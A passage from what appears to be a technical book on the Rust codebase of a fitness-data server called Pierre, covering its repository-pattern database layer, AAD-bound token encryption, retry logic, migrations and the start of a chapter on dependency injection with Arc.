crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get ApiKeyRepository for API key management
#[must_use]
pub fn api_keys(&self) -> repositories::ApiKeyRepositoryImpl {
repositories::ApiKeyRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get UsageRepository for usage tracking and analytics
#[must_use]
pub fn usage(&self) -> repositories::UsageRepositoryImpl {
repositories::UsageRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get A2ARepository for Agent-to-Agent management
#[must_use]
pub fn a2a(&self) -> repositories::A2ARepositoryImpl {
repositories::A2ARepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get ProfileRepository for user profiles and goals
#[must_use]
pub fn profiles(&self) -> repositories::ProfileRepositoryImpl {
repositories::ProfileRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get InsightRepository for AI-generated insights
#[must_use]
pub fn insights(&self) -> repositories::InsightRepositoryImpl {
repositories::InsightRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get AdminRepository for admin token management
#[must_use]
pub fn admins(&self) -> repositories::AdminRepositoryImpl {
repositories::AdminRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get TenantRepository for multi-tenant management
#[must_use]
pub fn tenants(&self) -> repositories::TenantRepositoryImpl {
repositories::TenantRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get SecurityRepository for security and key rotation
#[must_use]
pub fn security(&self) -> repositories::SecurityRepositoryImpl {
repositories::SecurityRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get NotificationRepository for OAuth notifications
#[must_use]
pub fn notifications(&self) -> repositories::NotificationRepositoryImpl {
repositories::NotificationRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get OAuth2ServerRepository for OAuth 2.0 server
#[must_use]
pub fn oauth2_server(&self) -> repositories::OAuth2ServerRepositoryImpl {
repositories::OAuth2ServerRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
/// Get FitnessConfigRepository for fitness configuration
#[must_use]
pub fn fitness_configs(&self) -> repositories::FitnessConfigRepositoryImpl {
repositories::FitnessConfigRepositoryImpl::new(
crate::database_plugins::factory::Database::SQLite(self.clone())
)
}
}
}
Usage pattern:
#![allow(unused)]
fn main() {
// Repository pattern - access through typed accessors
let user = database.users().get_by_id(user_id).await?;
let token = database.oauth_tokens().get(user_id, tenant_id, provider).await?;
let keys = database.api_keys().list_by_user(user_id).await?;
}
Benefits:
- Clarity:
database.users().create(...)is clearer thandatabase.create_user(...) - Cohesion: Related methods grouped together
- Testability: Can mock individual repositories
- Interface Segregation: Only depend on repositories you use
The 13 Repository Traits
1. Userrepository - User Account Management
Source: src/database/repositories/mod.rs:68-108
#![allow(unused)]
fn main() {
/// User account management repository
#[async_trait]
pub trait UserRepository: Send + Sync {
/// Create a new user account
async fn create(&self, user: &User) -> Result<Uuid, DatabaseError>;
/// Get user by ID
async fn get_by_id(&self, id: Uuid) -> Result<Option<User>, DatabaseError>;
/// Get user by email address
async fn get_by_email(&self, email: &str) -> Result<Option<User>, DatabaseError>;
/// Get user by email (required - fails if not found)
async fn get_by_email_required(&self, email: &str) -> Result<User, DatabaseError>;
/// Update user's last active timestamp
async fn update_last_active(&self, id: Uuid) -> Result<(), DatabaseError>;
/// Get total number of users
async fn get_count(&self) -> Result<i64, DatabaseError>;
/// Get users by status (pending, active, suspended)
async fn list_by_status(&self, status: &str) -> Result<Vec<User>, DatabaseError>;
/// Get users by status with cursor-based pagination
async fn list_by_status_paginated(
&self,
status: &str,
pagination: &PaginationParams,
) -> Result<CursorPage<User>, DatabaseError>;
/// Update user status and approval information
async fn update_status(
&self,
id: Uuid,
new_status: UserStatus,
approved_by: Option<Uuid>,
) -> Result<User, DatabaseError>;
/// Update user's tenant_id to link them to a tenant
async fn update_tenant_id(&self, id: Uuid, tenant_id: &str) -> Result<(), DatabaseError>;
}
}
2. Oauthtokenrepository - OAuth Token Storage (Tenant-scoped)
Source: src/database/repositories/mod.rs:110-160
#![allow(unused)]
fn main() {
/// OAuth token storage repository (tenant-scoped)
#[async_trait]
pub trait OAuthTokenRepository: Send + Sync {
/// Store or update user OAuth token for a tenant-provider combination
async fn upsert(&self, token: &UserOAuthToken) -> Result<(), DatabaseError>;
/// Get user OAuth token for a specific tenant-provider combination
async fn get(
&self,
user_id: Uuid,
tenant_id: &str,
provider: &str,
) -> Result<Option<UserOAuthToken>, DatabaseError>;
/// Get all OAuth tokens for a user across all tenants
async fn list_by_user(&self, user_id: Uuid) -> Result<Vec<UserOAuthToken>, DatabaseError>;
/// Get all OAuth tokens for a tenant-provider combination
async fn list_by_tenant_provider(
&self,
tenant_id: &str,
provider: &str,
) -> Result<Vec<UserOAuthToken>, DatabaseError>;
/// Delete user OAuth token for a tenant-provider combination
async fn delete(
&self,
user_id: Uuid,
tenant_id: &str,
provider: &str,
) -> Result<(), DatabaseError>;
/// Delete all OAuth tokens for a user (when user is deleted)
async fn delete_all_for_user(&self, user_id: Uuid) -> Result<(), DatabaseError>;
/// Update OAuth token expiration and refresh info
async fn refresh(
&self,
user_id: Uuid,
tenant_id: &str,
provider: &str,
access_token: &str,
refresh_token: Option<&str>,
expires_at: Option<DateTime<Utc>>,
) -> Result<(), DatabaseError>;
}
}
3. Apikeyrepository - API Key Management
Source: src/database/repositories/mod.rs:162-200
#![allow(unused)]
fn main() {
/// API key management repository
#[async_trait]
pub trait ApiKeyRepository: Send + Sync {
/// Create a new API key
async fn create(&self, key: &ApiKey) -> Result<(), DatabaseError>;
/// Get API key by key hash
async fn get_by_hash(&self, key_hash: &str) -> Result<Option<ApiKey>, DatabaseError>;
/// Get API key by ID
async fn get_by_id(&self, id: &str) -> Result<Option<ApiKey>, DatabaseError>;
/// List all API keys for a user
async fn list_by_user(&self, user_id: Uuid) -> Result<Vec<ApiKey>, DatabaseError>;
/// Revoke an API key
async fn revoke(&self, id: &str) -> Result<(), DatabaseError>;
/// Update API key last used timestamp
async fn update_last_used(&self, id: &str) -> Result<(), DatabaseError>;
/// Record API key usage
async fn record_usage(&self, usage: &ApiKeyUsage) -> Result<(), DatabaseError>;
/// Get usage statistics for an API key
async fn get_usage_stats(&self, key_id: &str) -> Result<ApiKeyUsageStats, DatabaseError>;
}
}
4-13. Other Repository Traits
The remaining repositories follow the same focused pattern:
- UsageRepository: JWT usage tracking, API request analytics
- A2ARepository: Agent-to-Agent task management, client registration
- ProfileRepository: User profiles, fitness goals, activities
- InsightRepository: AI-generated insights and recommendations
- AdminRepository: Admin token management, authorization
- TenantRepository: Multi-tenant management, tenant creation
- SecurityRepository: Key rotation, encryption key management
- NotificationRepository: OAuth callback notifications
- OAuth2ServerRepository: OAuth 2.0 server (client registration, tokens)
- FitnessConfigRepository: User fitness configuration storage
Complete trait definitions: src/database/repositories/mod.rs
Factory Pattern for Database Selection
Pierre automatically detects and instantiates the correct database backend:
Source: src/database_plugins/factory.rs:38-46
#![allow(unused)]
fn main() {
/// Database instance wrapper that delegates to the appropriate implementation
#[derive(Clone)]
pub enum Database {
/// SQLite database instance
SQLite(SqliteDatabase),
/// PostgreSQL database instance (requires postgresql feature)
#[cfg(feature = "postgresql")]
PostgreSQL(PostgresDatabase),
}
}
Automatic detection:
Source: src/database_plugins/factory.rs:164-184
#![allow(unused)]
fn main() {
/// Automatically detect database type from connection string
pub fn detect_database_type(database_url: &str) -> Result<DatabaseType> {
if database_url.starts_with("sqlite:") {
Ok(DatabaseType::SQLite)
} else if database_url.starts_with("postgresql://") || database_url.starts_with("postgres://") {
#[cfg(feature = "postgresql")]
return Ok(DatabaseType::PostgreSQL);
#[cfg(not(feature = "postgresql"))]
return Err(AppError::config(
"PostgreSQL connection string detected, but PostgreSQL support is not enabled. \
Enable the 'postgresql' feature flag in Cargo.toml",
)
.into());
} else {
Err(AppError::config(format!(
"Unsupported database URL format: {database_url}. \
Supported formats: sqlite:path/to/db.sqlite, postgresql://user:pass@host/db"
))
.into())
}
}
}
Usage:
#![allow(unused)]
fn main() {
// Automatically selects SQLite or PostgreSQL based on URL
let database = Database::new(
"sqlite:users.db", // or "postgresql://localhost/pierre"
encryption_key,
).await?;
}
Feature Flags for Database Backends
Pierre uses Cargo feature flags for conditional compilation:
Source: Cargo.toml (conceptual)
[features]
default = ["sqlite"]
sqlite = []
postgresql = ["sqlx/postgres"]
[dependencies]
sqlx = { version = "0.7", features = ["runtime-tokio-rustls", "sqlite", "macros", "migrate"] }
Conditional compilation:
Source: src/database_plugins/factory.rs:44-45
#![allow(unused)]
fn main() {
/// PostgreSQL database instance (requires postgresql feature)
#[cfg(feature = "postgresql")]
PostgreSQL(PostgresDatabase),
}
Build commands:
# SQLite (default)
cargo build
# PostgreSQL
cargo build --features postgresql
# Both (for testing)
cargo build --all-features
AAD-Based Encryption for OAuth Tokens
Pierre encrypts OAuth tokens with Additional Authenticated Data (AAD) binding:
Source: src/database_plugins/shared/encryption.rs:12-47
#![allow(unused)]
fn main() {
/// Create AAD (Additional Authenticated Data) context for token encryption
///
/// Format: "{tenant_id}|{user_id}|{provider}|{table}"
///
/// This prevents cross-tenant token reuse attacks by binding the encrypted
/// token to its specific context. If an attacker copies an encrypted token
/// to a different tenant/user/provider context, decryption will fail due to
/// AAD mismatch.
#[must_use]
pub fn create_token_aad_context(
tenant_id: &str,
user_id: Uuid,
provider: &str,
table: &str,
) -> String {
format!("{tenant_id}|{user_id}|{provider}|{table}")
}
}
Encryption with AAD:
Source: src/database_plugins/shared/encryption.rs:84-96
#![allow(unused)]
fn main() {
pub fn encrypt_oauth_token<D>(
db: &D,
token: &str,
tenant_id: &str,
user_id: Uuid,
provider: &str,
) -> Result<String>
where
D: HasEncryption,
{
let aad_context = create_token_aad_context(tenant_id, user_id, provider, "user_oauth_tokens");
db.encrypt_data_with_aad(token, &aad_context)
}
}
Security benefits:
- AES-256-GCM: AEAD cipher with authentication
- AAD binding: Token bound to tenant/user/provider context
- Cross-tenant protection: Can’t copy encrypted token to different tenant
- Tampering detection: AAD verification fails if data modified
- Compliance: GDPR, HIPAA, SOC 2 encryption-at-rest requirements
AAD format example:
tenant-123|550e8400-e29b-41d4-a716-446655440000|strava|user_oauth_tokens
Transaction Retry Patterns
Pierre handles database deadlocks and transient errors with exponential backoff:
Source: src/database_plugins/shared/transactions.rs:59-105
#![allow(unused)]
fn main() {
/// Retry a transaction operation if it fails due to deadlock or timeout
///
/// Exponential Backoff:
/// - Attempt 1: 10ms
/// - Attempt 2: 20ms
/// - Attempt 3: 40ms
/// - Attempt 4: 80ms
/// - Attempt 5: 160ms
pub async fn retry_transaction<F, Fut, T>(mut f: F, max_retries: u32) -> Result<T>
where
F: FnMut() -> Fut,
Fut: std::future::Future<Output = Result<T>>,
{
let mut attempts = 0;
loop {
match f().await {
Ok(result) => return Ok(result),
Err(e) => {
attempts += 1;
if attempts >= max_retries {
return Err(e);
}
let error_msg = format!("{e:?}");
if is_retryable_error(&error_msg) {
let backoff_ms = 10 * (1 << attempts);
sleep(Duration::from_millis(backoff_ms)).await;
} else {
// Non-retryable error
return Err(e);
}
}
}
}
}
}
Retryable errors:
Source: src/database_plugins/shared/transactions.rs:120-150
#![allow(unused)]
fn main() {
fn is_retryable_error(error_msg: &str) -> bool {
let error_lower = error_msg.to_lowercase();
// Retryable: Deadlock and locking errors
if error_lower.contains("deadlock")
|| error_lower.contains("database is locked")
|| error_lower.contains("locked")
|| error_lower.contains("busy")
{
return true;
}
// Retryable: Timeout errors
if error_lower.contains("timeout") || error_lower.contains("timed out") {
return true;
}
// Retryable: Serialization failures (PostgreSQL)
if error_lower.contains("serialization failure") {
return true;
}
// Non-retryable: Constraint violations
if error_lower.contains("unique constraint")
|| error_lower.contains("foreign key constraint")
|| error_lower.contains("check constraint")
{
return false;
}
false
}
}
Usage example:
#![allow(unused)]
fn main() {
use crate::database_plugins::shared::transactions::retry_transaction;
retry_transaction(
|| async {
db.users().create(&user).await
},
3 // max retries
).await?;
}
Shared Database Utilities
The shared module provides reusable components across backends (880 lines total), eliminating massive code duplication. The refactoring deleted the 3,058-line sqlite.rs wrapper file entirely.
Structure:
src/database_plugins/shared/
├── mod.rs # Module exports (23 lines)
├── encryption.rs # AAD-based encryption utilities (201 lines)
├── transactions.rs # Retry patterns with backoff (162 lines)
├── enums.rs # Shared enum conversions (143 lines)
├── mappers.rs # Row -> struct conversion (192 lines)
├── validation.rs # Input validation (150 lines)
└── builders.rs # Query builder helpers (9 lines, deferred)
Benefits:
- DRY principle: No duplicate encryption/retry logic
- Consistency: Same behavior across SQLite and PostgreSQL
- Testability: Shared utilities tested once, work everywhere
- Maintainability: Bug fixes apply to all backends
- Code reduction: Eliminated 3,058 lines of wrapper boilerplate
Enum Conversions (Enums.rs)
Source: src/database_plugins/shared/enums.rs:24-50
#![allow(unused)]
fn main() {
/// Convert UserTier enum to database string representation
#[must_use]
#[inline]
pub const fn user_tier_to_str(tier: &UserTier) -> &'static str {
match tier {
UserTier::Starter => tiers::STARTER,
UserTier::Professional => tiers::PROFESSIONAL,
UserTier::Enterprise => tiers::ENTERPRISE,
}
}
/// Convert database string to UserTier enum
/// Unknown values default to Starter tier for safety
#[must_use]
pub fn str_to_user_tier(s: &str) -> UserTier {
match s {
tiers::PROFESSIONAL | "pro" => UserTier::Professional,
tiers::ENTERPRISE => UserTier::Enterprise,
_ => UserTier::Starter,
}
}
}
Also includes:
user_status_to_str()/str_to_user_status()- Active/Pending/Suspendedtask_status_to_str()/str_to_task_status()- Pending/Running/Completed/Failed/Cancelled
Why this matters: Both SQLite and PostgreSQL store enums as TEXT, requiring identical conversion logic. Sharing this eliminates duplicate code and ensures consistent enum handling.
Generic Row Parsing (Mappers.rs)
Database-agnostic User parsing:
Source: src/database_plugins/shared/mappers.rs:37-74
#![allow(unused)]
fn main() {
/// Parse User from database row (works with PostgreSQL and SQLite)
pub fn parse_user_from_row<R>(row: &R) -> Result<User>
where
R: sqlx::Row,
for<'a> &'a str: sqlx::ColumnIndex<R>,
for<'a> usize: sqlx::ColumnIndex<R>,
Uuid: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
String: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
Option<String>: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
// ... extensive trait bounds
{
// Parse enum fields using shared converters
let user_status_str: String = row.try_get("user_status")?;
let user_status = super::enums::str_to_user_status(&user_status_str);
let tier_str: String = row.try_get("tier")?;
let tier = super::enums::str_to_user_tier(&tier_str);
Ok(User {
id: row.try_get("id")?,
email: row.try_get("email")?,
display_name: row.try_get("display_name")?,
password_hash: row.try_get("password_hash")?,
tier,
tenant_id: row.try_get("tenant_id")?,
is_active: row.try_get("is_active")?,
user_status,
is_admin: row.try_get("is_admin").unwrap_or(false),
approved_by: row.try_get("approved_by")?,
approved_at: row.try_get("approved_at")?,
created_at: row.try_get("created_at")?,
last_active: row.try_get("last_active")?,
// OAuth tokens loaded separately
strava_token: None,
fitbit_token: None,
})
}
}
UUID handling across databases:
Source: src/database_plugins/shared/mappers.rs:177-192
#![allow(unused)]
fn main() {
/// Extract UUID from row (handles PostgreSQL UUID vs SQLite TEXT)
pub fn get_uuid_from_row<R>(row: &R, column: &str) -> Result<Uuid>
where
R: sqlx::Row,
for<'a> &'a str: sqlx::ColumnIndex<R>,
Uuid: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
String: for<'a> sqlx::Type<R::Database> + for<'a> sqlx::Decode<'a, R::Database>,
{
// Try PostgreSQL UUID type first
if let Ok(uuid) = row.try_get::<Uuid, _>(column) {
return Ok(uuid);
}
// Fall back to SQLite TEXT (parse string)
let uuid_str: String = row.try_get(column)?;
Ok(Uuid::parse_str(&uuid_str)?)
}
}
Why this matters: PostgreSQL has native UUID support, SQLite stores UUIDs as TEXT. This helper abstracts the difference.
Also includes: parse_a2a_task_from_row<R>() for A2A task parsing with JSON deserialization.
Input Validation (Validation.rs)
Email validation:
Source: src/database_plugins/shared/validation.rs:34-39
#![allow(unused)]
fn main() {
/// Validate email format
pub fn validate_email(email: &str) -> Result<()> {
if !email.contains('@') || email.len() < 3 {
return Err(AppError::invalid_input("Invalid email format").into());
}
Ok(())
}
}
Tenant ownership (authorization):
Source: src/database_plugins/shared/validation.rs:63-75
#![allow(unused)]
fn main() {
/// Validate that entity belongs to specified tenant
pub fn validate_tenant_ownership(
entity_tenant_id: &str,
expected_tenant_id: &str,
entity_type: &str,
) -> Result<()> {
if entity_tenant_id != expected_tenant_id {
return Err(AppError::auth_invalid(format!(
"{entity_type} does not belong to the specified tenant"
))
.into());
}
Ok(())
}
}
Expiration checks (OAuth tokens, sessions):
Source: src/database_plugins/shared/validation.rs:104-113
#![allow(unused)]
fn main() {
/// Validate expiration timestamp
pub fn validate_not_expired(
expires_at: DateTime<Utc>,
now: DateTime<Utc>,
entity_type: &str,
) -> Result<()> {
if expires_at <= now {
return Err(AppError::invalid_input(format!("{entity_type} has expired")).into());
}
Ok(())
}
}
Scope authorization (OAuth2, A2A):
Source: src/database_plugins/shared/validation.rs:140-150
#![allow(unused)]
fn main() {
/// Validate scope authorization
pub fn validate_scope_granted(
requested_scopes: &[String],
granted_scopes: &[String],
) -> Result<()> {
for scope in requested_scopes {
if !granted_scopes.contains(scope) {
return Err(AppError::auth_invalid(format!("Scope '{scope}' not granted")).into());
}
}
Ok(())
}
}
Why this matters: Multi-tenant authorization and OAuth validation logic is identical across backends. Centralizing prevents divergence.
Hasencryption Trait
Both database backends implement this shared encryption interface:
Source: src/database_plugins/shared/encryption.rs:129-137
#![allow(unused)]
fn main() {
/// Trait for database encryption operations
pub trait HasEncryption {
/// Encrypt data with Additional Authenticated Data (AAD) context
fn encrypt_data_with_aad(&self, data: &str, aad: &str) -> Result<String>;
/// Decrypt data with AAD context verification
fn decrypt_data_with_aad(&self, encrypted: &str, aad: &str) -> Result<String>;
}
}
Why this matters: Allows shared encryption utilities to work with both SQLite and PostgreSQL implementations through trait bounds.
Rust Idioms: Repository Pattern
Pattern: Focused, cohesive interfaces
#![allow(unused)]
fn main() {
// Database provides accessors
impl Database {
pub fn users(&self) -> UserRepositoryImpl { ... }
pub fn oauth_tokens(&self) -> OAuthTokenRepositoryImpl { ... }
}
// Usage
let user = db.users().get_by_id(user_id).await?;
let token = db.oauth_tokens().get(user_id, tenant_id, provider).await?;
}
Why this works:
- Single Responsibility: Each repository handles one domain
- Interface Segregation: Consumers only depend on what they need
- Testability: Can mock individual repositories
- Clarity:
db.users().create()is clearer thandb.create_user()
Rust Idioms: Conditional Compilation
Pattern: Feature-gated code with clear error messages
#![allow(unused)]
fn main() {
#[cfg(feature = "postgresql")]
PostgreSQL(PostgresDatabase),
#[cfg(not(feature = "postgresql"))]
DatabaseType::PostgreSQL => {
Err(AppError::config(
"PostgreSQL support not enabled. Enable the 'postgresql' feature flag."
).into())
}
}
Benefits:
- Binary size: SQLite-only builds exclude PostgreSQL dependencies
- Compilation speed: Only compile enabled backends
- Clear errors: Helpful messages when feature missing
Connection Pooling PostgreSQL
PostgreSQL implementation uses connection pooling for performance:
Configuration (src/config/environment.rs - conceptual):
#![allow(unused)]
fn main() {
pub struct PostgresPoolConfig {
pub max_connections: u32, // Default: 10
pub min_connections: u32, // Default: 2
pub acquire_timeout_secs: u64, // Default: 30
pub idle_timeout_secs: Option<u64>, // Default: 600 (10 min)
pub max_lifetime_secs: Option<u64>, // Default: 1800 (30 min)
}
}
Pool creation:
#![allow(unused)]
fn main() {
let pool = PgPoolOptions::new()
.max_connections(config.max_connections)
.min_connections(config.min_connections)
.acquire_timeout(Duration::from_secs(config.acquire_timeout_secs))
.idle_timeout(config.idle_timeout_secs.map(Duration::from_secs))
.max_lifetime(config.max_lifetime_secs.map(Duration::from_secs))
.connect(&database_url)
.await?;
}
Why pooling:
- Performance: Reuse connections, avoid handshake overhead
- Concurrency: Handle multiple simultaneous requests
- Resource limits: Cap max connections to database
- Health: Recycle connections after max lifetime
Migration System
Pierre uses SQLx migrations for schema management. See migrations/README.md for comprehensive documentation.
20 migration files covering 40+ tables:
| Migration | Tables/Changes |
|---|---|
20250120000001_users_schema.sql | users, user_profiles, user_oauth_app_credentials |
20250120000002_api_keys_schema.sql | api_keys, api_key_usage |
20250120000003_analytics_schema.sql | jwt_usage, goals, insights, request_logs |
20250120000004_a2a_schema.sql | a2a_clients, a2a_sessions, a2a_tasks, a2a_usage |
20250120000005_admin_schema.sql | admin_tokens, admin_token_usage, admin_provisioned_keys, system_secrets, rsa_keypairs |
20250120000006_oauth_tokens_schema.sql | user_oauth_tokens |
20250120000007_oauth_notifications_schema.sql | oauth_notifications |
20250120000008_oauth2_schema.sql | oauth2_clients, oauth2_auth_codes, oauth2_refresh_tokens, oauth2_states |
20250120000009_tenant_management_schema.sql | tenants, tenant_oauth_credentials, oauth_apps, key_versions, audit_events, tenant_users |
20250120000010_fitness_configurations_schema.sql | fitness_configurations |
20250120000011_expand_oauth_provider_constraints.sql | Adds garmin, whoop, terra to provider CHECK constraints |
20250120000012_user_roles_permissions.sql | impersonation_sessions, permission_delegations, user_mcp_tokens; adds role column to users |
20250120000013_system_settings_schema.sql | system_settings |
20250120000014_add_missing_foreign_keys.sql | Adds FK constraints to a2a_clients.user_id, user_configurations.user_id |
20250120000015_remove_legacy_user_token_columns.sql | Removes legacy OAuth columns from users; adds last_sync to user_oauth_tokens |
20250120000017_chat_schema.sql | chat_conversations, chat_messages |
20250120000018_firebase_auth.sql | Adds firebase_uid, auth_provider columns to users |
20250120000019_recipes_schema.sql | recipes, recipe_ingredients |
20250120000020_admin_config_schema.sql | admin_config_overrides, admin_config_audit, admin_config_categories |
20250120000021_add_config_categories.sql | Adds provider, cache, MCP, monitoring categories |
Example schema (migrations/20250120000006_oauth_tokens_schema.sql):
CREATE TABLE IF NOT EXISTS user_oauth_tokens (
id TEXT PRIMARY KEY,
user_id TEXT NOT NULL,
tenant_id TEXT NOT NULL,
provider TEXT NOT NULL,
access_token TEXT NOT NULL, -- Encrypted with AAD
refresh_token TEXT, -- Encrypted with AAD
token_type TEXT NOT NULL DEFAULT 'bearer',
expires_at TEXT,
scope TEXT,
created_at TEXT NOT NULL,
updated_at TEXT NOT NULL,
UNIQUE(user_id, tenant_id, provider)
);
Cross-database compatibility:
- All types use TEXT (portable across SQLite and PostgreSQL)
- Timestamps stored as ISO8601 strings (app-generated)
- UUIDs stored as TEXT (app-generated)
- Booleans stored as INTEGER (0/1)
Migration execution:
#![allow(unused)]
fn main() {
async fn migrate(&self) -> Result<()> {
sqlx::migrate!("./migrations")
.run(&self.pool)
.await?;
Ok(())
}
}
Migration benefits:
- Version control: Migrations tracked in git
- Reproducibility: Same schema on dev/staging/prod
- Rollback: Down migrations for reverting changes
- Type safety: SQLx compile-time query verification
Multi-Tenant Data Isolation
Database schema enforces tenant isolation:
Composite primary keys:
CREATE TABLE user_oauth_tokens (
user_id UUID NOT NULL,
tenant_id TEXT NOT NULL, -- Part of primary key
provider TEXT NOT NULL,
-- ...
PRIMARY KEY (user_id, tenant_id, provider)
);
Queries always include tenant_id:
#![allow(unused)]
fn main() {
db.oauth_tokens()
.get(user_id, tenant_id, provider)
.await?;
}
AAD encryption binding: Tenant ID in AAD prevents cross-tenant token copying at encryption layer.
Key Takeaways
-
Repository pattern: 13 focused traits replaced 135-method god-trait (commit
6f3efef). -
Accessor methods:
db.users(),db.oauth_tokens(), etc. provide clear, focused interfaces. -
SOLID principles: Single Responsibility and Interface Segregation enforced.
-
Factory pattern: Automatic database type detection from connection string.
-
Feature flags: Conditional compilation for database backends.
-
AAD encryption: OAuth tokens encrypted with tenant/user/provider binding via
HasEncryptiontrait. -
Transaction retry: Exponential backoff for deadlock/timeout errors (10ms to 160ms).
-
Shared utilities: 880 lines across 6 modules eliminated 3,058 lines of wrapper boilerplate:
- enums.rs: UserTier, UserStatus, TaskStatus conversions
- mappers.rs: Generic row parsing with complex trait bounds
- validation.rs: Email, tenant ownership, expiration, scope checks
- encryption.rs: AAD-based encryption utilities
- transactions.rs: Retry patterns with exponential backoff
- builders.rs: Deferred to later phase (minimal implementation)
-
Connection pooling: PostgreSQL uses pooling for performance and concurrency.
-
Migration system: SQLx migrations for version-controlled schema changes.
-
Multi-tenant isolation: Composite keys and AAD binding enforce tenant boundaries.
-
Instrumentation: Tracing macros add database operation context to logs.
-
Error handling: Clear messages when feature flags missing or URLs invalid.
-
Code reduction: Refactoring deleted the entire 3,058-line
sqlite.rswrapper file.
Related Chapters:
- Chapter 2: Error Handling (DatabaseError types)
- Chapter 5: Cryptographic Keys (encryption key management)
- Chapter 7: Multi-Tenant Isolation (application-layer tenant context)
- Chapter 23: Testing Framework (database testing patterns)
Chapter 4: Dependency Injection with Context Pattern
Introduction
Rust’s ownership system makes dependency injection (DI) different from languages with garbage collection. You can’t just pass references everywhere - you need to think about lifetimes and ownership.
Pierre uses Arc
Key concepts:
- Dependency Injection: Providing dependencies to a struct rather than creating them internally
- Arc
: Thread-safe reference-counted smart pointer - Service Locator: Anti-pattern where a single struct holds all dependencies
- Focused Contexts: Better pattern with separate contexts for different domains
The Problem: Expensive Resource Creation
Consider what happens without dependency injection:
#![allow(unused)]
fn main() {
// ANTI-PATTERN: Creating expensive resources repeatedly
async fn handle_request(user_id: &str) -> Result<Response> {
// Creates new database connection (expensive!)
let database = Database::new(&config.database_url).await?;
// Creates new auth manager (unnecessary!)
let auth_manager = AuthManager::new(24);
// Use them...
let user = database.get_user(user_id).await?;
let token = auth_manager.create_token(&user)?;
Ok(response)
}
}
Problems:
- Performance: Database connection pool created per request
- Resource exhaustion: Each connection uses memory/file descriptors
- Configuration duplication: Same config loaded repeatedly
- No sharing: Can’t share state (caches, metrics) between requests
Solution 1: Dependency Injection with Arc<T>
Arc (Atomic Reference Counting) enables shared ownership across threads.
Arc Basics
#![allow(unused)]
fn main() {
use std::sync::Arc;
// Create an expensive resource once
let database = Arc::new(Database::new(&config).await?);
// Clone the Arc (cheap - just increments counter)
let db_clone = Arc::clone(&database); // Or database.clone()
// Both point to the same underlying Database
// When last Arc is dropped, Database is dropped
}
Rust Idioms Explained:
-
Arc::new(value)- Wrap value in atomic reference counter- Allocates on heap
- Returns
Arc<T> - Thread-safe (uses atomic operations)
-
Arc::clone(&arc)vs.clone()- Both do the same thing (increment counter)
Arc::clonemakes it explicit (recommended in docs).clone()is shorter (common in Pierre)
-
Drop semantics
- Each
Arc::clone()increments counter - Each drop decrements counter
- When counter reaches 0, inner value is dropped
- Each
-
Cost
- Creating Arc: One heap allocation
- Cloning Arc: Increment atomic counter (~1-2 CPU instructions)
- Accessing data: No overhead (just deref)
Reference: Rust Book - Arc
Dependency Injection Example
use std::sync::Arc;
// 1. Create expensive resources once at startup
#[tokio::main]
async fn main() -> Result<()> {
let database = Arc::new(Database::new(&config).await?);
let auth_manager = Arc::new(AuthManager::new(24));
// 2. Pass to HTTP handlers via Axum state
let app = Router::new()
.route("/users/:id", get(get_user_handler))
.with_state(AppState { database, auth_manager });
// 3. Listen for requests
axum::Server::bind(&addr).serve(app.into_make_service()).await?;
Ok(())
}
// Handler receives dependencies via State extractor
async fn get_user_handler(
State(state): State<AppState>,
Path(user_id): Path<String>,
) -> Result<Json<User>, AppError> {
// database and auth_manager are Arc clones (cheap)
let user = state.database.get_user(&user_id).await?;
let token = state.auth_manager.create_token(&user)?;
Ok(Json(user))
}
#[derive(Clone)]
struct AppState {
database: Arc<Database>,
auth_manager: Arc<AuthManager>,
}
Pattern:
- Create once → Wrap in Arc → Share via cloning Arc
Reference: Axum - Sharing State
Serverresources: Centralized Dependency Container
Pierre uses ServerResources as a central container for all dependencies.
Source: src/mcp/resources.rs:35-77
#![allow(unused)]
fn main() {
/// Centralized resource container for dependency injection
#[derive(Clone)]
pub struct ServerResources {
/// Database connection pool for persistent storage operations
pub database: Arc<Database>,
/// Authentication manager for user identity verification
pub auth_manager: Arc<AuthManager>,
/// JSON Web Key Set manager for RS256 JWT signing and verification
pub jwks_manager: Arc<JwksManager>,
/// Authentication middleware for MCP request validation
pub auth_middleware: Arc<McpAuthMiddleware>,
/// WebSocket connection manager for real-time updates
pub websocket_manager: Arc<WebSocketManager>,
/// Server-Sent Events manager for streaming notifications
pub sse_manager: Arc<crate::sse::SseManager>,
/// OAuth client for multi-tenant authentication flows
pub tenant_oauth_client: Arc<TenantOAuthClient>,
/// Registry of fitness data providers (Strava, Fitbit, Garmin, WHOOP, Terra)
pub provider_registry: Arc<ProviderRegistry>,
/// Secret key for admin JWT token generation
pub admin_jwt_secret: Arc<str>,
/// Server configuration loaded from environment
pub config: Arc<crate::config::environment::ServerConfig>,
/// AI-powered fitness activity analysis engine
pub activity_intelligence: Arc<ActivityIntelligence>,
/// A2A protocol client manager
pub a2a_client_manager: Arc<A2AClientManager>,
/// Service for managing A2A system user accounts
pub a2a_system_user_service: Arc<A2ASystemUserService>,
/// Broadcast channel for OAuth completion notifications
pub oauth_notification_sender: Option<broadcast::Sender<OAuthCompletedNotification>>,
/// Cache layer for performance optimization
pub cache: Arc<Cache>,
/// Optional plugin executor for custom tool implementations
pub plugin_executor: Option<Arc<PluginToolExecutor>>,
/// Configuration for PII redaction in logs and responses
pub redaction_config: Arc<RedactionConfig>,
/// Rate limiter for OAuth2 endpoints
pub oauth2_rate_limiter: Arc<crate::oauth2_server::rate_limiting::OAuth2RateLimiter>,
}
}
